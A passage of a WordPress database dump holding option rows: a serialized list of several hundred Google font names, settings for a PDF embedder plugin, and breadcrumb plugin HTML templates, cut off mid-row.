(2119, 'wpmdia_font_family', 'a:726:{i:0;s:7:\"ABeeZee\";i:1;s:4:\"Abel\";i:2;s:5:\"Dosis\";i:3;s:13:\"Abril Fatface\";i:4;s:8:\"Aclonica\";i:5;s:4:\"Acme\";i:6;s:5:\"Actor\";i:7;s:7:\"Adamina\";i:8;s:10:\"Advent Pro\";i:9;s:15:\"Aguafina Script\";i:10;s:7:\"Akronim\";i:11;s:6:\"Aladin\";i:12;s:7:\"Aldrich\";i:13;s:4:\"Alef\";i:14;s:8:\"Alegreya\";i:15;s:11:\"Alegreya SC\";i:16;s:13:\"Alegreya Sans\";i:17;s:16:\"Alegreya Sans SC\";i:18;s:10:\"Alex Brush\";i:19;s:13:\"Alfa Slab One\";i:20;s:5:\"Alice\";i:21;s:5:\"Alike\";i:22;s:13:\"Alike Angular\";i:23;s:5:\"Allan\";i:24;s:7:\"Allerta\";i:25;s:15:\"Allerta Stencil\";i:26;s:6:\"Allura\";i:27;s:8:\"Almendra\";i:28;s:16:\"Almendra Display\";i:29;s:11:\"Almendra SC\";i:30;s:8:\"Amarante\";i:31;s:8:\"Amaranth\";i:32;s:9:\"Amatic SC\";i:33;s:9:\"Amethysta\";i:34;s:5:\"Amiri\";i:35;s:5:\"Amita\";i:36;s:7:\"Anaheim\";i:37;s:6:\"Andada\";i:38;s:6:\"Andika\";i:39;s:6:\"Angkor\";i:40;s:24:\"Annie Use Your Telescope\";i:41;s:13:\"Anonymous Pro\";i:42;s:5:\"Antic\";i:43;s:12:\"Antic Didone\";i:44;s:10:\"Antic Slab\";i:45;s:5:\"Anton\";i:46;s:6:\"Arapey\";i:47;s:7:\"Arbutus\";i:48;s:12:\"Arbutus Slab\";i:49;s:19:\"Architects Daughter\";i:50;s:13:\"Archivo Black\";i:51;s:14:\"Archivo Narrow\";i:52;s:5:\"Arimo\";i:53;s:8:\"Arizonia\";i:54;s:6:\"Armata\";i:55;s:8:\"Artifika\";i:56;s:4:\"Arvo\";i:57;s:4:\"Arya\";i:58;s:4:\"Asap\";i:59;s:4:\"Asar\";i:60;s:5:\"Asset\";i:61;s:7:\"Astloch\";i:62;s:4:\"Asul\";i:63;s:10:\"Atomic Age\";i:64;s:6:\"Aubrey\";i:65;s:9:\"Audiowide\";i:66;s:10:\"Autour One\";i:67;s:7:\"Average\";i:68;s:12:\"Average Sans\";i:69;s:19:\"Averia Gruesa Libre\";i:70;s:12:\"Averia Libre\";i:71;s:17:\"Averia Sans Libre\";i:72;s:18:\"Averia Serif Libre\";i:73;s:10:\"Bad Script\";i:74;s:9:\"Balthazar\";i:75;s:7:\"Bangers\";i:76;s:5:\"Basic\";i:77;s:10:\"Battambang\";i:78;s:7:\"Baumans\";i:79;s:5:\"Bayon\";i:80;s:8:\"Belgrano\";i:81;s:7:\"Belleza\";i:82;s:9:\"BenchNine\";i:83;s:7:\"Bentham\";i:84;s:15:\"Berkshire Swash\";i:85;s:5:\"Bevan\";i:86;s:13:\"Bigelow Rules\";i:87;s:11:\"Bigshot One\";i:88;s:5:\"Bilbo\";i:89;s:16:\"Bilbo Swash Caps\";i:90;s:7:\"Biryani\";i:91;s:6:\"Bitter\";i:92;s:13:\"Black Ops One\";i:93;s:5:\"Bokor\";i:94;s:6:\"Bonbon\";i:95;s:8:\"Boogaloo\";i:96;s:10:\"Bowlby One\";i:97;s:13:\"Bowlby One SC\";i:98;s:7:\"Brawler\";i:99;s:10:\"Bree Serif\";i:100;s:14:\"Bubblegum Sans\";i:101;s:11:\"Bubbler One\";i:102;s:4:\"Buda\";i:103;s:7:\"Buenard\";i:104;s:10:\"Butcherman\";i:105;s:14:\"Butterfly Kids\";i:106;s:5:\"Cabin\";i:107;s:15:\"Cabin Condensed\";i:108;s:12:\"Cabin Sketch\";i:109;s:15:\"Caesar Dressing\";i:110;s:10:\"Cagliostro\";i:111;s:14:\"Calligraffitti\";i:112;s:6:\"Cambay\";i:113;s:5:\"Cambo\";i:114;s:6:\"Candal\";i:115;s:9:\"Cantarell\";i:116;s:11:\"Cantata One\";i:117;s:11:\"Cantora One\";i:118;s:8:\"Capriola\";i:119;s:5:\"Cardo\";i:120;s:5:\"Carme\";i:121;s:14:\"Carrois Gothic\";i:122;s:17:\"Carrois Gothic SC\";i:123;s:10:\"Carter One\";i:124;s:6:\"Caudex\";i:125;s:18:\"Cedarville Cursive\";i:126;s:11:\"Ceviche One\";i:127;s:10:\"Changa One\";i:128;s:6:\"Chango\";i:129;s:18:\"Chau Philomene One\";i:130;s:9:\"Chela One\";i:131;s:14:\"Chelsea Market\";i:132;s:6:\"Chenla\";i:133;s:17:\"Cherry Cream Soda\";i:134;s:12:\"Cherry Swash\";i:135;s:5:\"Chewy\";i:136;s:6:\"Chicle\";i:137;s:5:\"Chivo\";i:138;s:6:\"Cinzel\";i:139;s:17:\"Cinzel Decorative\";i:140;s:14:\"Clicker Script\";i:141;s:4:\"Coda\";i:142;s:12:\"Coda Caption\";i:143;s:8:\"Codystar\";i:144;s:5:\"Combo\";i:145;s:9:\"Comfortaa\";i:146;s:11:\"Coming Soon\";i:147;s:11:\"Concert One\";i:148;s:9:\"Condiment\";i:149;s:7:\"Content\";i:150;s:12:\"Contrail One\";i:151;s:11:\"Convergence\";i:152;s:6:\"Cookie\";i:153;s:5:\"Copse\";i:154;s:6:\"Corben\";i:155;s:9:\"Courgette\";i:156;s:7:\"Cousine\";i:157;s:8:\"Coustard\";i:158;s:21:\"Covered By Your Grace\";i:159;s:12:\"Crafty Girls\";i:160;s:9:\"Creepster\";i:161;s:11:\"Crete Round\";i:162;s:12:\"Crimson Text\";i:163;s:13:\"Croissant One\";i:164;s:7:\"Crushed\";i:165;s:6:\"Cuprum\";i:166;s:6:\"Cutive\";i:167;s:11:\"Cutive Mono\";i:168;s:6:\"Damion\";i:169;s:14:\"Dancing Script\";i:170;s:7:\"Dangrek\";i:171;s:20:\"Dawning of a New Day\";i:172;s:8:\"Days One\";i:173;s:5:\"Dekko\";i:174;s:6:\"Delius\";i:175;s:17:\"Delius Swash Caps\";i:176;s:14:\"Delius Unicase\";i:177;s:13:\"Della Respira\";i:178;s:8:\"Denk One\";i:179;s:10:\"Devonshire\";i:180;s:8:\"Dhurjati\";i:181;s:13:\"Didact Gothic\";i:182;s:9:\"Diplomata\";i:183;s:12:\"Diplomata SC\";i:184;s:6:\"Domine\";i:185;s:11:\"Donegal One\";i:186;s:10:\"Doppio One\";i:187;s:5:\"Dorsa\";i:188;s:5:\"Dosis\";i:189;s:11:\"Dr Sugiyama\";i:190;s:10:\"Droid Sans\";i:191;s:15:\"Droid Sans Mono\";i:192;s:11:\"Droid Serif\";i:193;s:9:\"Duru Sans\";i:194;s:9:\"Dynalight\";i:195;s:11:\"EB Garamond\";i:196;s:10:\"Eagle Lake\";i:197;s:5:\"Eater\";i:198;s:9:\"Economica\";i:199;s:5:\"Eczar\";i:200;s:8:\"Ek Mukta\";i:201;s:11:\"Electrolize\";i:202;s:5:\"Elsie\";i:203;s:16:\"Elsie Swash Caps\";i:204;s:11:\"Emblema One\";i:205;s:12:\"Emilys Candy\";i:206;s:10:\"Engagement\";i:207;s:9:\"Englebert\";i:208;s:9:\"Enriqueta\";i:209;s:9:\"Erica One\";i:210;s:7:\"Esteban\";i:211;s:15:\"Euphoria Script\";i:212;s:5:\"Ewert\";i:213;s:3:\"Exo\";i:214;s:5:\"Exo 2\";i:215;s:13:\"Expletus Sans\";i:216;s:12:\"Fanwood Text\";i:217;s:9:\"Fascinate\";i:218;s:16:\"Fascinate Inline\";i:219;s:10:\"Faster One\";i:220;s:8:\"Fasthand\";i:221;s:9:\"Fauna One\";i:222;s:8:\"Federant\";i:223;s:6:\"Federo\";i:224;s:6:\"Felipa\";i:225;s:5:\"Fenix\";i:226;s:12:\"Finger Paint\";i:227;s:9:\"Fira Mono\";i:228;s:9:\"Fira Sans\";i:229;s:10:\"Fjalla One\";i:230;s:9:\"Fjord One\";i:231;s:8:\"Flamenco\";i:232;s:7:\"Flavors\";i:233;s:10:\"Fondamento\";i:234;s:16:\"Fontdiner Swanky\";i:235;s:5:\"Forum\";i:236;s:12:\"Francois One\";i:237;s:12:\"Freckle Face\";i:238;s:20:\"Fredericka the Great\";i:239;s:11:\"Fredoka One\";i:240;s:8:\"Freehand\";i:241;s:6:\"Fresca\";i:242;s:7:\"Frijole\";i:243;s:7:\"Fruktur\";i:244;s:9:\"Fugaz One\";i:245;s:9:\"GFS Didot\";i:246;s:15:\"GFS Neohellenic\";i:247;s:8:\"Gabriela\";i:248;s:6:\"Gafata\";i:249;s:8:\"Galdeano\";i:250;s:7:\"Galindo\";i:251;s:13:\"Gentium Basic\";i:252;s:18:\"Gentium Book Basic\";i:253;s:3:\"Geo\";i:254;s:7:\"Geostar\";i:255;s:12:\"Geostar Fill\";i:256;s:12:\"Germania One\";i:257;s:6:\"Gidugu\";i:258;s:13:\"Gilda Display\";i:259;s:14:\"Give You Glory\";i:260;s:13:\"Glass Antiqua\";i:261;s:6:\"Glegoo\";i:262;s:17:\"Gloria Hallelujah\";i:263;s:10:\"Goblin One\";i:264;s:10:\"Gochi Hand\";i:265;s:8:\"Gorditas\";i:266;s:21:\"Goudy Bookletter 1911\";i:267;s:8:\"Graduate\";i:268;s:11:\"Grand Hotel\";i:269;s:12:\"Gravitas One\";i:270;s:11:\"Great Vibes\";i:271;s:6:\"Griffy\";i:272;s:6:\"Gruppo\";i:273;s:5:\"Gudea\";i:274;s:8:\"Gurajada\";i:275;s:6:\"Habibi\";i:276;s:6:\"Halant\";i:277;s:15:\"Hammersmith One\";i:278;s:7:\"Hanalei\";i:279;s:12:\"Hanalei Fill\";i:280;s:7:\"Handlee\";i:281;s:7:\"Hanuman\";i:282;s:12:\"Happy Monkey\";i:283;s:12:\"Headland One\";i:284;s:11:\"Henny Penny\";i:285;s:20:\"Herr Von Muellerhoff\";i:286;s:4:\"Hind\";i:287;s:15:\"Holtwood One SC\";i:288;s:14:\"Homemade Apple\";i:289;s:8:\"Homenaje\";i:290;s:15:\"IM Fell DW Pica\";i:291;s:18:\"IM Fell DW Pica SC\";i:292;s:19:\"IM Fell Double Pica\";i:293;s:22:\"IM Fell Double Pica SC\";i:294;s:15:\"IM Fell English\";i:295;s:18:\"IM Fell English SC\";i:296;s:20:\"IM Fell French Canon\";i:297;s:23:\"IM Fell French Canon SC\";i:298;s:20:\"IM Fell Great Primer\";i:299;s:23:\"IM Fell Great Primer SC\";i:300;s:7:\"Iceberg\";i:301;s:7:\"Iceland\";i:302;s:7:\"Imprima\";i:303;s:11:\"Inconsolata\";i:304;s:5:\"Inder\";i:305;s:12:\"Indie Flower\";i:306;s:5:\"Inika\";i:307;s:14:\"Inknut Antiqua\";i:308;s:12:\"Irish Grover\";i:309;s:9:\"Istok Web\";i:310;s:8:\"Italiana\";i:311;s:9:\"Italianno\";i:312;s:16:\"Jacques Francois\";i:313;s:23:\"Jacques Francois Shadow\";i:314;s:5:\"Jaldi\";i:315;s:14:\"Jim Nightshade\";i:316;s:10:\"Jockey One\";i:317;s:12:\"Jolly Lodger\";i:318;s:12:\"Josefin Sans\";i:319;s:12:\"Josefin Slab\";i:320;s:8:\"Joti One\";i:321;s:6:\"Judson\";i:322;s:5:\"Julee\";i:323;s:15:\"Julius Sans One\";i:324;s:5:\"Junge\";i:325;s:4:\"Jura\";i:326;s:17:\"Just Another Hand\";i:327;s:23:\"Just Me Again Down Here\";i:328;s:5:\"Kadwa\";i:329;s:5:\"Kalam\";i:330;s:7:\"Kameron\";i:331;s:9:\"Kantumruy\";i:332;s:5:\"Karla\";i:333;s:5:\"Karma\";i:334;s:14:\"Kaushan Script\";i:335;s:6:\"Kavoon\";i:336;s:10:\"Kdam Thmor\";i:337;s:10:\"Keania One\";i:338;s:10:\"Kelly Slab\";i:339;s:5:\"Kenia\";i:340;s:5:\"Khand\";i:341;s:5:\"Khmer\";i:342;s:5:\"Khula\";i:343;s:8:\"Kite One\";i:344;s:7:\"Knewave\";i:345;s:9:\"Kotta One\";i:346;s:6:\"Koulen\";i:347;s:6:\"Kranky\";i:348;s:5:\"Kreon\";i:349;s:6:\"Kristi\";i:350;s:9:\"Krona One\";i:351;s:6:\"Kurale\";i:352;s:15:\"La Belle Aurore\";i:353;s:5:\"Laila\";i:354;s:11:\"Lakki Reddy\";i:355;s:8:\"Lancelot\";i:356;s:6:\"Lateef\";i:357;s:4:\"Lato\";i:358;s:13:\"League Script\";i:359;s:12:\"Leckerli One\";i:360;s:6:\"Ledger\";i:361;s:6:\"Lekton\";i:362;s:5:\"Lemon\";i:363;s:17:\"Libre Baskerville\";i:364;s:11:\"Life Savers\";i:365;s:10:\"Lilita One\";i:366;s:15:\"Lily Script One\";i:367;s:9:\"Limelight\";i:368;s:11:\"Linden Hill\";i:369;s:7:\"Lobster\";i:370;s:11:\"Lobster Two\";i:371;s:16:\"Londrina Outline\";i:372;s:15:\"Londrina Shadow\";i:373;s:15:\"Londrina Sketch\";i:374;s:14:\"Londrina Solid\";i:375;s:4:\"Lora\";i:376;s:21:\"Love Ya Like A Sister\";i:377;s:17:\"Loved by the King\";i:378;s:14:\"Lovers Quarrel\";i:379;s:12:\"Luckiest Guy\";i:380;s:8:\"Lusitana\";i:381;s:7:\"Lustria\";i:382;s:7:\"Macondo\";i:383;s:18:\"Macondo Swash Caps\";i:384;s:5:\"Magra\";i:385;s:13:\"Maiden Orange\";i:386;s:4:\"Mako\";i:387;s:8:\"Mallanna\";i:388;s:7:\"Mandali\";i:389;s:9:\"Marcellus\";i:390;s:12:\"Marcellus SC\";i:391;s:12:\"Marck Script\";i:392;s:9:\"Margarine\";i:393;s:9:\"Marko One\";i:394;s:8:\"Marmelad\";i:395;s:6:\"Martel\";i:396;s:11:\"Martel Sans\";i:397;s:6:\"Marvel\";i:398;s:4:\"Mate\";i:399;s:7:\"Mate SC\";i:400;s:9:\"Maven Pro\";i:401;s:7:\"McLaren\";i:402;s:6:\"Meddon\";i:403;s:13:\"MedievalSharp\";i:404;s:10:\"Medula One\";i:405;s:6:\"Megrim\";i:406;s:11:\"Meie Script\";i:407;s:8:\"Merienda\";i:408;s:12:\"Merienda One\";i:409;s:12:\"Merriweather\";i:410;s:17:\"Merriweather Sans\";i:411;s:5:\"Metal\";i:412;s:11:\"Metal Mania\";i:413;s:12:\"Metamorphous\";i:414;s:11:\"Metrophobic\";i:415;s:8:\"Michroma\";i:416;s:7:\"Milonga\";i:417;s:9:\"Miltonian\";i:418;s:16:\"Miltonian Tattoo\";i:419;s:7:\"Miniver\";i:420;s:14:\"Miss Fajardose\";i:421;s:5:\"Modak\";i:422;s:14:\"Modern Antiqua\";i:423;s:7:\"Molengo\";i:424;s:5:\"Molle\";i:425;s:5:\"Monda\";i:426;s:8:\"Monofett\";i:427;s:7:\"Monoton\";i:428;s:20:\"Monsieur La Doulaise\";i:429;s:7:\"Montaga\";i:430;s:6:\"Montez\";i:431;s:10:\"Montserrat\";i:432;s:21:\"Montserrat Alternates\";i:433;s:20:\"Montserrat Subrayada\";i:434;s:4:\"Moul\";i:435;s:8:\"Moulpali\";i:436;s:22:\"Mountains of Christmas\";i:437;s:13:\"Mouse Memoirs\";i:438;s:10:\"Mr Bedfort\";i:439;s:8:\"Mr Dafoe\";i:440;s:14:\"Mr De Haviland\";i:441;s:19:\"Mrs Saint Delafield\";i:442;s:13:\"Mrs Sheppards\";i:443;s:4:\"Muli\";i:444;s:13:\"Mystery Quest\";i:445;s:3:\"NTR\";i:446;s:6:\"Neucha\";i:447;s:6:\"Neuton\";i:448;s:10:\"New Rocker\";i:449;s:10:\"News Cycle\";i:450;s:7:\"Niconne\";i:451;s:9:\"Nixie One\";i:452;s:6:\"Nobile\";i:453;s:6:\"Nokora\";i:454;s:7:\"Norican\";i:455;s:7:\"Nosifer\";i:456;s:20:\"Nothing You Could Do\";i:457;s:12:\"Noticia Text\";i:458;s:9:\"Noto Sans\";i:459;s:10:\"Noto Serif\";i:460;s:8:\"Nova Cut\";i:461;s:9:\"Nova Flat\";i:462;s:9:\"Nova Mono\";i:463;s:9:\"Nova Oval\";i:464;s:10:\"Nova Round\";i:465;s:11:\"Nova Script\";i:466;s:9:\"Nova Slim\";i:467;s:11:\"Nova Square\";i:468;s:6:\"Numans\";i:469;s:6:\"Nunito\";i:470;s:14:\"Odor Mean Chey\";i:471;s:7:\"Offside\";i:472;s:15:\"Old Standard TT\";i:473;s:9:\"Oldenburg\";i:474;s:11:\"Oleo Script\";i:475;s:22:\"Oleo Script Swash Caps\";i:476;s:9:\"Open Sans\";i:477;s:19:\"Open Sans Condensed\";i:478;s:11:\"Oranienbaum\";i:479;s:8:\"Orbitron\";i:480;s:7:\"Oregano\";i:481;s:7:\"Orienta\";i:482;s:15:\"Original Surfer\";i:483;s:6:\"Oswald\";i:484;s:16:\"Over the Rainbow\";i:485;s:8:\"Overlock\";i:486;s:11:\"Overlock SC\";i:487;s:3:\"Ovo\";i:488;s:6:\"Oxygen\";i:489;s:11:\"Oxygen Mono\";i:490;s:7:\"PT Mono\";i:491;s:7:\"PT Sans\";i:492;s:15:\"PT Sans Caption\";i:493;s:14:\"PT Sans Narrow\";i:494;s:8:\"PT Serif\";i:495;s:16:\"PT Serif Caption\";i:496;s:8:\"Pacifico\";i:497;s:9:\"Palanquin\";i:498;s:14:\"Palanquin Dark\";i:499;s:7:\"Paprika\";i:500;s:10:\"Parisienne\";i:501;s:11:\"Passero One\";i:502;s:11:\"Passion One\";i:503;s:18:\"Pathway Gothic One\";i:504;s:12:\"Patrick Hand\";i:505;s:15:\"Patrick Hand SC\";i:506;s:9:\"Patua One\";i:507;s:11:\"Paytone One\";i:508;s:7:\"Peddana\";i:509;s:7:\"Peralta\";i:510;s:16:\"Permanent Marker\";i:511;s:19:\"Petit Formal Script\";i:512;s:7:\"Petrona\";i:513;s:11:\"Philosopher\";i:514;s:6:\"Piedra\";i:515;s:13:\"Pinyon Script\";i:516;s:10:\"Pirata One\";i:517;s:7:\"Plaster\";i:518;s:4:\"Play\";i:519;s:8:\"Playball\";i:520;s:16:\"Playfair Display\";i:521;s:19:\"Playfair Display SC\";i:522;s:7:\"Podkova\";i:523;s:10:\"Poiret One\";i:524;s:10:\"Poller One\";i:525;s:4:\"Poly\";i:526;s:8:\"Pompiere\";i:527;s:12:\"Pontano Sans\";i:528;s:7:\"Poppins\";i:529;s:16:\"Port Lligat Sans\";i:530;s:16:\"Port Lligat Slab\";i:531;s:14:\"Pragati Narrow\";i:532;s:5:\"Prata\";i:533;s:11:\"Preahvihear\";i:534;s:14:\"Press Start 2P\";i:535;s:14:\"Princess Sofia\";i:536;s:8:\"Prociono\";i:537;s:10:\"Prosto One\";i:538;s:7:\"Puritan\";i:539;s:12:\"Purple Purse\";i:540;s:6:\"Quando\";i:541;s:8:\"Quantico\";i:542;s:12:\"Quattrocento\";i:543;s:17:\"Quattrocento Sans\";i:544;s:9:\"Questrial\";i:545;s:9:\"Quicksand\";i:546;s:14:\"Quintessential\";i:547;s:7:\"Qwigley\";i:548;s:15:\"Racing Sans One\";i:549;s:6:\"Radley\";i:550;s:8:\"Rajdhani\";i:551;s:7:\"Raleway\";i:552;s:12:\"Raleway Dots\";i:553;s:10:\"Ramabhadra\";i:554;s:8:\"Ramaraja\";i:555;s:6:\"Rambla\";i:556;s:12:\"Rammetto One\";i:557;s:8:\"Ranchers\";i:558;s:6:\"Rancho\";i:559;s:5:\"Ranga\";i:560;s:9:\"Rationale\";i:561;s:12:\"Ravi Prakash\";i:562;s:9:\"Redressed\";i:563;s:13:\"Reenie Beanie\";i:564;s:7:\"Revalia\";i:565;s:13:\"Rhodium Libre\";i:566;s:6:\"Ribeye\";i:567;s:13:\"Ribeye Marrow\";i:568;s:9:\"Righteous\";i:569;s:6:\"Risque\";i:570;s:6:\"Roboto\";i:571;s:16:\"Roboto Condensed\";i:572;s:11:\"Roboto Mono\";i:573;s:11:\"Roboto Slab\";i:574;s:9:\"Rochester\";i:575;s:9:\"Rock Salt\";i:576;s:7:\"Rokkitt\";i:577;s:9:\"Romanesco\";i:578;s:9:\"Ropa Sans\";i:579;s:7:\"Rosario\";i:580;s:8:\"Rosarivo\";i:581;s:12:\"Rouge Script\";i:582;s:9:\"Rozha One\";i:583;s:5:\"Rubik\";i:584;s:14:\"Rubik Mono One\";i:585;s:9:\"Rubik One\";i:586;s:4:\"Ruda\";i:587;s:6:\"Rufina\";i:588;s:11:\"Ruge Boogie\";i:589;s:6:\"Ruluko\";i:590;s:10:\"Rum Raisin\";i:591;s:14:\"Ruslan Display\";i:592;s:9:\"Russo One\";i:593;s:6:\"Ruthie\";i:594;s:3:\"Rye\";i:595;s:10:\"Sacramento\";i:596;s:7:\"Sahitya\";i:597;s:4:\"Sail\";i:598;s:5:\"Salsa\";i:599;s:7:\"Sanchez\";i:600;s:8:\"Sancreek\";i:601;s:11:\"Sansita One\";i:602;s:6:\"Sarala\";i:603;s:6:\"Sarina\";i:604;s:8:\"Sarpanch\";i:605;s:7:\"Satisfy\";i:606;s:5:\"Scada\";i:607;s:12:\"Scheherazade\";i:608;s:10:\"Schoolbell\";i:609;s:14:\"Seaweed Script\";i:610;s:9:\"Sevillana\";i:611;s:11:\"Seymour One\";i:612;s:18:\"Shadows Into Light\";i:613;s:22:\"Shadows Into Light Two\";i:614;s:6:\"Shanti\";i:615;s:5:\"Share\";i:616;s:10:\"Share Tech\";i:617;s:15:\"Share Tech Mono\";i:618;s:9:\"Shojumaru\";i:619;s:11:\"Short Stack\";i:620;s:8:\"Siemreap\";i:621;s:10:\"Sigmar One\";i:622;s:7:\"Signika\";i:623;s:16:\"Signika Negative\";i:624;s:9:\"Simonetta\";i:625;s:7:\"Sintony\";i:626;s:13:\"Sirin Stencil\";i:627;s:8:\"Six Caps\";i:628;s:7:\"Skranji\";i:629;s:10:\"Slabo 13px\";i:630;s:10:\"Slabo 27px\";i:631;s:7:\"Slackey\";i:632;s:6:\"Smokum\";i:633;s:6:\"Smythe\";i:634;s:7:\"Sniglet\";i:635;s:7:\"Snippet\";i:636;s:13:\"Snowburst One\";i:637;s:10:\"Sofadi One\";i:638;s:5:\"Sofia\";i:639;s:10:\"Sonsie One\";i:640;s:16:\"Sorts Mill Goudy\";i:641;s:15:\"Source Code Pro\";i:642;s:15:\"Source Sans Pro\";i:643;s:16:\"Source Serif Pro\";i:644;s:13:\"Special Elite\";i:645;s:10:\"Spicy Rice\";i:646;s:9:\"Spinnaker\";i:647;s:6:\"Spirax\";i:648;s:10:\"Squada One\";i:649;s:20:\"Sree Krushnadevaraya\";i:650;s:9:\"Stalemate\";i:651;s:13:\"Stalinist One\";i:652;s:15:\"Stardos Stencil\";i:653;s:21:\"Stint Ultra Condensed\";i:654;s:20:\"Stint Ultra Expanded\";i:655;s:5:\"Stoke\";i:656;s:6:\"Strait\";i:657;s:19:\"Sue Ellen Francisco\";i:658;s:6:\"Sumana\";i:659;s:9:\"Sunshiney\";i:660;s:16:\"Supermercado One\";i:661;s:4:\"Sura\";i:662;s:7:\"Suranna\";i:663;s:9:\"Suravaram\";i:664;s:11:\"Suwannaphum\";i:665;s:18:\"Swanky and Moo Moo\";i:666;s:9:\"Syncopate\";i:667;s:9:\"Tangerine\";i:668;s:6:\"Taprom\";i:669;s:5:\"Tauri\";i:670;s:4:\"Teko\";i:671;s:5:\"Telex\";i:672;s:18:\"Tenali Ramakrishna\";i:673;s:10:\"Tenor Sans\";i:674;s:11:\"Text Me One\";i:675;s:18:\"The Girl Next Door\";i:676;s:6:\"Tienne\";i:677;s:7:\"Tillana\";i:678;s:7:\"Timmana\";i:679;s:5:\"Tinos\";i:680;s:9:\"Titan One\";i:681;s:13:\"Titillium Web\";i:682;s:11:\"Trade Winds\";i:683;s:7:\"Trocchi\";i:684;s:7:\"Trochut\";i:685;s:7:\"Trykker\";i:686;s:10:\"Tulpen One\";i:687;s:6:\"Ubuntu\";i:688;s:16:\"Ubuntu Condensed\";i:689;s:11:\"Ubuntu Mono\";i:690;s:5:\"Ultra\";i:691;s:14:\"Uncial Antiqua\";i:692;s:8:\"Underdog\";i:693;s:9:\"Unica One\";i:694;s:14:\"UnifrakturCook\";i:695;s:18:\"UnifrakturMaguntia\";i:696;s:7:\"Unkempt\";i:697;s:6:\"Unlock\";i:698;s:4:\"Unna\";i:699;s:5:\"VT323\";i:700;s:11:\"Vampiro One\";i:701;s:6:\"Varela\";i:702;s:12:\"Varela Round\";i:703;s:11:\"Vast Shadow\";i:704;s:12:\"Vesper Libre\";i:705;s:5:\"Vibur\";i:706;s:8:\"Vidaloka\";i:707;s:4:\"Viga\";i:708;s:5:\"Voces\";i:709;s:7:\"Volkhov\";i:710;s:8:\"Vollkorn\";i:711;s:8:\"Voltaire\";i:712;s:23:\"Waiting for the Sunrise\";i:713;s:8:\"Wallpoet\";i:714;s:15:\"Walter Turncoat\";i:715;s:6:\"Warnes\";i:716;s:9:\"Wellfleet\";i:717;s:9:\"Wendy One\";i:718;s:8:\"Wire One\";i:719;s:9:\"Work Sans\";i:720;s:17:\"Yanone Kaffeesatz\";i:721;s:11:\"Yantramanav\";i:722;s:10:\"Yellowtail\";i:723;s:10:\"Yeseva One\";i:724;s:10:\"Yesteryear\";i:725;s:6:\"Zeyada\";}', 'yes'),
(2130, 'pdfemb_poweredby', '1', 'no'),
(2135, 'pdfemb', 'a:5:{s:12:\"pdfemb_width\";s:3:\"max\";s:13:\"pdfemb_height\";s:3:\"max\";s:14:\"pdfemb_toolbar\";s:3:\"top\";s:19:\"pdfemb_toolbarfixed\";s:2:\"on\";s:14:\"pdfemb_version\";s:5:\"3.1.8\";}', 'yes'),
(2165, 'bcn_options', 'a:41:{s:17:\"bmainsite_display\";b:1;s:18:\"Hmainsite_template\";s:234:\"<span property=\"itemListElement\" typeof=\"ListItem\"><a property=\"item\" typeof=\"WebPage\" title=\"Go to %title%.\" href=\"%link%\" class=\"%type%\"><span property=\"name\">%htitle%</span></a><meta property=\"position\" content=\"%position%\"></span>\";s:28:\"Hmainsite_template_no_anchor\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:13:\"bhome_display\";b:1;s:14:\"Hhome_template\";s:234:\"<span property=\"itemListElement\" typeof=\"ListItem\"><a property=\"item\" typeof=\"WebPage\" title=\"Go to %title%.\" href=\"%link%\" class=\"%type%\"><span property=\"name\">%htitle%</span></a><meta property=\"position\" content=\"%position%\"></span>\";s:24:\"Hhome_template_no_anchor\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:13:\"bblog_display\";b:1;s:10:\"hseparator\";s:6:\" > \";s:12:\"blimit_title\";b:0;s:17:\"amax_title_length\";i:20;s:20:\"bcurrent_item_linked\";b:0;s:28:\"bpost_page_hierarchy_display\";b:1;s:25:\"Spost_page_hierarchy_type\";s:15:\"BCN_POST_PARENT\";s:19:\"Hpost_page_template\";s:234:\"<span property=\"itemListElement\" typeof=\"ListItem\"><a property=\"item\" typeof=\"WebPage\" title=\"Go to %title%.\" href=\"%link%\" class=\"%type%\"><span property=\"name\">%htitle%</span></a><meta property=\"position\" content=\"%position%\"></span>\";s:29:\"Hpost_page_template_no_anchor\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:15:\"apost_page_root\";s:3:\"160\";s:15:\"Hpaged_template\";s:147:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">Page %htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:14:\"bpaged_display\";b:0;s:19:\"Hpost_post_template\";s:234:\"<span property=\"itemListElement\" typeof=\"ListItem\"><a property=\"item\" typeof=\"WebPage\" title=\"Go to %title%.\" href=\"%link%\" class=\"%type%\"><span property=\"name\">%htitle%</span></a><meta property=\"position\" content=\"%position%\"></span>\";s:29:\"Hpost_post_template_no_anchor\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:15:\"apost_post_root\";s:1:\"0\";s:28:\"bpost_post_hierarchy_display\";b:1;s:27:\"bpost_post_taxonomy_referer\";b:0;s:25:\"Spost_post_hierarchy_type\";s:8:\"category\";s:25:\"Hpost_attachment_template\";s:234:\"<span property=\"itemListElement\" typeof=\"ListItem\"><a property=\"item\" typeof=\"WebPage\" title=\"Go to %title%.\" href=\"%link%\" class=\"%type%\"><span property=\"name\">%htitle%</span></a><meta property=\"position\" content=\"%position%\"></span>\";s:35:\"Hpost_attachment_template_no_anchor\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:13:\"H404_template\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:10:\"S404_title\";s:3:\"404\";s:16:\"Hsearch_template\";s:300:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">Search results for '<a property=\"item\" typeof=\"WebPage\" title=\"Go to the first page of search results for %title%.\" href=\"%link%\" class=\"%type%\">%htitle%</a>'</span><meta property=\"position\" content=\"%position%\"></span>\";s:26:\"Hsearch_template_no_anchor\";s:171:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">Search results for '%htitle%'</span><meta property=\"position\" content=\"%position%\"></span>\";s:22:\"Htax_post_tag_template\";s:251:\"<span property=\"itemListElement\" typeof=\"ListItem\"><a property=\"item\" typeof=\"WebPage\" title=\"Go to the %title% tag 